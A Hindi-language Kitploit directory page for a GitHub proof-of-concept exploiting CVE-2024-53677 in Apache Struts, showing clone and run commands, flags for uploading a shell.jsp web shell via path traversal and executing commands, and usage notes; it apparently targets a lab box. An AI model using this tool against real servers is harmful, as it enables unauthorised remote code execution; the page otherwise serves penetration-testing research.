Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-53677-POC — CVE-2024-53677 का एक प्रूफ ऑफ कॉन्सेप्ट | Kitploit
उपकरण/GitHubGitHub/cythonic1/cve-2024-53677-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubcythonic1/cve-2024-53677-poc

CVE-2024-53677-POC

CVE-2024-53677 का एक प्रूफ ऑफ कॉन्सेप्ट

रिपॉजिटरी देखें
1111 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-53677

एक पुरानी कमज़ोरी जो Apache Struts को प्रभावित करती है, जिससे LFI और दूरस्थ निष्पादन (remote execution) होता है।

इस कमज़ोरी के बारे में अधिक जानकारी के लिए आप इस बेहतरीन ब्लॉग को देख सकते हैं।

Apache Struts path traversal → RCE (CVE-2024-53677)

POC का उपयोग

मैंने इसे यथासंभव अनुकूलन योग्य बनाने में बहुत समय बिताया है, क्योंकि जब मैंने पहली बार इस CVE का सामना किया, तो मुझे कोई अच्छा स्रोत नहीं मिला जो इसे सही ढंग से लागू करता हो। अधिकांश फ़्लैग के डिफ़ॉल्ट मान हैं, इसलिए इन सभी फ़्लैग को देखकर निराश न हों।

root@kitploit:~
git clone https://github.com/Cythonic1/CVE-2024-53677-POC
cd  CVE-2024-53677-POC
go run . -h
root@kitploit:~

  -command string
        command to execute on the server default: whoami
  -end-point string
        post endpoint default to: upload.action
  -file-location string
        where to save the file into the server default: what test function return
  -lfi-param string
        Parameter name for LFI testing default: top.UploadFileName
  -payload-file string
        Path to the payload file default: ./shell.jsp
  -payload-file-name string
        name of the payload it self default: shell.jsp
  -payload-param string
        Parameter name for payload injection default: Upload
  -test-file-name string
        name of the testfile it self default: testfile.txt
  -testing-file string
        File used for testing default: ./testfile.txt
  -url string
        Target base URL (format http://strutted.htb/) do not forgot the [/] at the end

इन सभी कमांड के डिफ़ॉल्ट मान हैं। मैंने एक परीक्षण फ़ंक्शन भी लागू किया है जो यह जाँचता है कि फ़ाइल कहाँ रखी जानी चाहिए, और यह उपयोगकर्ता द्वारा कॉन्फ़िगर करने योग्य विकल्प भी है।

मूल उपयोग

root@kitploit:~
go run .  -url http://127.0.0.1:8080/ -end-point upload.action

नोट्स।

कुछ बातें ध्यान देने योग्य हैं।

  1. डिफ़ॉल्ट पेलोड GIF फ़ॉर्मैट में है और कंटेंट टाइप gif है, यदि इसे बदलने की आवश्यकता हो, तो यह एकमात्र विकल्प है जहाँ आपको कोड बदलना होगा।
  2. परीक्षण फ़ंक्शन गलत अनुमान लगा सकता है, इसलिए इस पर 100% भरोसा न करें।
  3. हो सकता है कि आपको एक्सप्लॉइट को एक से अधिक बार, कम से कम दो बार चलाना पड़े, क्योंकि मैंने देखा कि जब पहली बार पेलोड अपलोड किया गया, तो वह अगले ही अनुरोध पर नहीं मिला। इसलिए इसे ध्यान में रखें।

योगदान।

बेझिझक एक्सप्लॉइट में बदलाव करें या जोड़ें ♥️।

संसाधन।

Vulnerable docker image एक्सप्लॉइट के बारे में अधिक जानकारी

टूल डाउनलोड करें